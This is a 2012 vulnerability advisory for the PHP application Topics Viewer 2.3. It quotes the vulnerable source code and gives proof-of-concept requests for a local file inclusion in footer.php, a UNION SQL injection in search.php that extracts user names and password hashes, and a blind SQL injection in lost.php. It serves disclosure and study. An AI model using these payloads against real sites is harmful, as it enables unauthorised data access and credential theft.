Topics Viewer 2.3 Local File Inclusion / SQL Injection

2012.05.30
Credit: n4ss1m
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-98

################################################################################################ # Exploit Title: Topics viewer v 2.3 Multiple Vulnerabilities # Software Link: http://nilehoster.com/default/topicsviewer # Author: n4ss1m # Date: 19-05-2012 # Tested on: win/linux # Home : www.Sec4ever.com <http://www.sec4ever.com/> ################################################################################################ # Local File Inclusion ( footer.php ) <?php // footer file // echo "<br>"; @include ("themes/$site_theme/templates/footer_head.html"); # <-- $site_theme without value echo "<br>"; ...etc... ?> # PoC : http://domain.tld/footer.php?site_theme=../robots.txt%00 # Note : register_globals must be ON ################################################################################################ # SQL injection ( search.php ) <? ... $q = strip_tags (trim(str_replace('"','',$_GET['q']))); # <---- variable $q equal $_GET['q'] ... if(isset ($q) && !empty ($q) && $q != " ") { $q = strip_tags(trim($_GET['q'])); $sql_s1 = "SELECT * FROM topics where t_title like '%$q%' OR t_desc like '%$q%'"; # $q :) $res_s1 = @mysql_query($sql_s1); ... ?> # PoC : http://domain.tld/search.php?q=junk'+union+select+1,group_concat(u_name,0x3a,u_mpass),3,4,5,6,7,8,9,10,11,12+from+users+where+u_id=1%23&search=true # magic_quotes_gpc must be OFF ################################################################################################ # Blind SQL injection ( lost.php ) <? .... if(!empty($_POST[uname]) && !empty($_POST[reg_mail]) && !empty($_POST[to_mail]) && strstr($_POST[to_mail],".") && strstr($_POST[to_mail],"@") && strstr($_POST[reg_mail],".") && strstr ($_POST[reg_mail],"@") ){ $s_pass = md5($_POST[s_pass]); $sql_ver = "SELECT * FROM users where u_name = '$_POST[uname]' AND u_email = '$_POST[reg_mail]'"; # <-- $_POST[uname] not secure we can use it to inject mysql query $res_ver = @mysql_query ($sql_ver); $result_ver = @mysql_numrows($res_ver); $user = @mysql_fetch_assoc($res_ver); .... ?> # PoC : POST : uname=junk'[SQL injection]%23_mail=email@email.tld&to_mail=email2@email.tld&B1=true http://domain.tld/lost.php # magic_quotes_gpc must be OFF ################################################################################################ # References : http://www.exploit4arab.com/exploits/69 # Vendor reported on : 19-05-2012 # published on : 27-05-2012 ################################################################################################

References:

http://www.sec4ever.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top